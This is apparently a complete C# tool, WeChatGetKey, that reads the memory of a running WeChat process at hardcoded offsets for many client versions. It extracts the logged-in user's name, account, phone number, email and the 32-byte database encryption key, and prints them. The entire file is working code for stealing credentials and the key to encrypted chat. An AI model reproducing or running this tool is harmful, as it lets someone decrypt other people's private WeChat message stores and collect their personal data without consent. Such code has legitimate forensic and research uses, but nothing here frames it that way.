using System; using System.Collections.Generic; using System.Diagnostics; using System.Runtime.InteropServices; using System.Text; namespace WeChatGetKey { internal class Program { private static void Main(string[] args) { try { Program.ReadTest(); } catch (Exception ex) { Console.WriteLine("Error:" + ex.Message); } finally { //Console.ReadKey(); } Console.WriteLine("[+] Done."); } private static void ReadTest() {; Process WeChatProcess = null; Process[] WeChatProcessName = Process.GetProcessesByName("WeChat"); List list = null; foreach (Process WeChatProcess2 in WeChatProcessName) { WeChatProcess = WeChatProcess2; Console.WriteLine("[+] WeChatProcessPID: " + WeChatProcess2.Id.ToString()); foreach (object obj in WeChatProcess.Modules) { ProcessModule processModule = (ProcessModule)obj; if (processModule.ModuleName == "WeChatWin.dll") { Program.WeChatWinBaseAddress = processModule.BaseAddress; string fileVersion = processModule.FileVersionInfo.FileVersion; Console.WriteLine("[+] WeChatVersion: " + fileVersion); if (!Program.versionlist.TryGetValue(fileVersion, out list)) { Console.WriteLine("[-] WeChat Current Version Is: " + fileVersion + " Not Support"); return; } break; } } if (list == null) { Console.WriteLine("[-] WeChat Base Address Get Faild"); } else { int WeChatName = (int)Program.WeChatWinBaseAddress + list[0]; Console.WriteLine("[+] WeChatName: " + Program.GetName(WeChatProcess.Handle, (IntPtr)WeChatName, 100)); int WeChatAccount = (int)Program.WeChatWinBaseAddress + list[1]; string Account = Program.GetMobile(WeChatProcess.Handle, (IntPtr)WeChatAccount); if (string.IsNullOrWhiteSpace(Account)) { Console.WriteLine("[-] WeChatAccount: Can't Get User Account, Maybe No Login"); } else { Console.WriteLine("[+] WeChatAccount: " + Program.GetAccount(WeChatProcess.Handle, (IntPtr)WeChatAccount, 100)); } int WeChatMobile = (int)Program.WeChatWinBaseAddress + list[2]; string Mobile = Program.GetMobile(WeChatProcess.Handle, (IntPtr)WeChatMobile); if (string.IsNullOrWhiteSpace(Mobile)) { Console.WriteLine("[-] WeChatMobile: Can't Get User Mobile, Maybe No Login or Maybe User Is No Binding Mobile"); } else { Console.WriteLine("[+] WeChatMobile: " + Program.GetMobile(WeChatProcess.Handle, (IntPtr)WeChatMobile, 100)); } int WeChatMail = (int)Program.WeChatWinBaseAddress + list[3]; string Mail = Program.GetMail(WeChatProcess.Handle, (IntPtr)WeChatMail); if (string.IsNullOrWhiteSpace(Mail)) { Console.WriteLine("[-] WeChatMail: Can't Get User Mail, Maybe User Is No Binding Email Address or The current is New Version"); } else { Console.WriteLine("[+] WeChatMail: " + Program.GetMail(WeChatProcess.Handle, (IntPtr)WeChatMail, 100)); } int WeChatKey = (int)Program.WeChatWinBaseAddress + list[4]; string HexKey = Program.GetHex(WeChatProcess.Handle, (IntPtr)WeChatKey); if (string.IsNullOrWhiteSpace(HexKey)) { Console.WriteLine("[-] WeChatKey: WeChat Is Run, But Maybe No Login"); return; } else { Console.WriteLine("[+] WeChatKey: " + HexKey); } } } if (WeChatProcess == null) { Console.WriteLine("[-] WeChat No Run"); return; } } private static string GetName(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100) { byte[] array = new byte[nSize]; if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0) { return ""; } string text = ""; foreach (char c in Encoding.UTF8.GetString(array)) { if (c == '\0') { break; } text += c.ToString(); } return text; } private static string GetAccount(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100) { byte[] array = new byte[nSize]; if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0) { return ""; } string text = ""; foreach (char c in Encoding.UTF8.GetString(array)) { if (c == '\0') { break; } text += c.ToString(); } return text; } private static string GetMobile(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100) { byte[] array = new byte[nSize]; if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0) { return ""; } string text = ""; foreach (char c in Encoding.UTF8.GetString(array)) { if (c == '\0') { break; } text += c.ToString(); } return text; } private static string GetMail(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100) { byte[] array = new byte[nSize]; if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0) { return ""; } string text = ""; foreach (char c in Encoding.UTF8.GetString(array)) { if (c == '\0') { break; } text += c.ToString(); } return text; } private static string GetHex(IntPtr hProcess, IntPtr lpBaseAddress) { byte[] array = new byte[4]; if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, 4, 0) == 0) { return ""; } int num = 32; byte[] array2 = new byte[num]; IntPtr lpBaseAddress2 = (IntPtr)(((int)array[3] << 24) + ((int)array[2] << 16) + ((int)array[1] << 8) + (int)array[0]); if (Program.ReadProcessMemory(hProcess, lpBaseAddress2, array2, num, 0) == 0) { return ""; } return Program.bytes2hex(array2); } private static string bytes2hex(byte[] bytes) { return BitConverter.ToString(bytes, 0).Replace("-", string.Empty).ToLower().ToUpper(); } [DllImport("kernel32.dll")] public static extern int OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll")] public static extern int GetModuleHandleA(string moduleName); [DllImport("kernel32.dll")] public static extern int ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, int lpNumberOfBytesRead); public static Dictionary> versionlist = new Dictionary> { { "3.2.1.154", new List { 328121948, 328122328, 328123056, 328121976, 328123020 } }, { "3.3.0.115", new List { 31323364, 31323744, 31324472, 31323392, 31324436 } }, { "3.3.0.84", new List { 31315212, 31315592, 31316320, 31315240, 31316284 } }, { "3.3.0.93", new List { 31323364, 31323744, 31324472, 31323392, 31324436 } }, { "3.3.5.34", new List { 30603028, 30603408, 30604120, 30603056, 30604100 } }, { "3.3.5.42", new List { 30603012, 30603392, 30604120, 30603040, 30604084 } }, { "3.3.5.46", new List { 30578372, 30578752, 30579480, 30578400, 30579444 } }, { "3.4.0.37", new List { 31608116, 31608496, 31609224, 31608144, 31609188 } }, { "3.4.0.38", new List { 31604044, 31604424, 31605152, 31604072, 31605116 } }, { "3.4.0.50", new List { 31688500, 31688880, 31689608, 31688528, 31689572 } }, { "3.4.0.54", new List { 31700852, 31701248, 31700920, 31700880, 31701924 } }, { "3.4.5.27", new List { 32133788, 32134168, 32134896, 32133816, 32134860 } }, { "3.4.5.45", new List { 32147012, 32147392, 32147064, 32147040, 32148084 } }, { "3.5.0.20", new List { 35494484, 35494864, 35494536, 35494512, 35495556 } }, { "3.5.0.29", new List { 35507980, 35508360, 35508032, 35508008, 35509052 } }, { "3.5.0.33", new List { 35512140, 35512520, 35512192, 35512168, 35513212 } }, { "3.5.0.39", new List { 35516236, 35516616, 35516288, 35516264, 35517308 } }, { "3.5.0.42", new List { 35512140, 35512520, 35512192, 35512168, 35513212 } }, { "3.5.0.44", new List { 35510836, 35511216, 35510896, 35510864, 35511908 } }, { "3.5.0.46", new List { 35506740, 35507120, 35506800, 35506768, 35507812 } }, { "3.6.0.18", new List { 35842996, 35843376, 35843048, 35843024, 35844068 } }, { "3.6.5.7", new List { 35864356, 35864736, 35864408, 35864384, 35865428 } }, { "3.6.5.16", new List { 35909428, 35909808, 35909480, 35909456, 35910500 } }, { "3.7.0.26", new List { 37105908, 37106288, 37105960, 37105936, 37106980 } }, { "3.7.0.29", new List { 37105908, 37106288, 37105960, 37105936, 37106980 } }, { "3.7.0.30", new List { 37118196, 37118576, 37118248, 37118224, 37119268 } }, { "3.7.5.11", new List { 37883280, 37884088, 37883136, 37883008, 37884052 } }, { "3.7.5.23", new List { 37895736, 37896544, 37895592, 37883008, 37896508 } } }; private static IntPtr WeChatWinBaseAddress = IntPtr.Zero; } }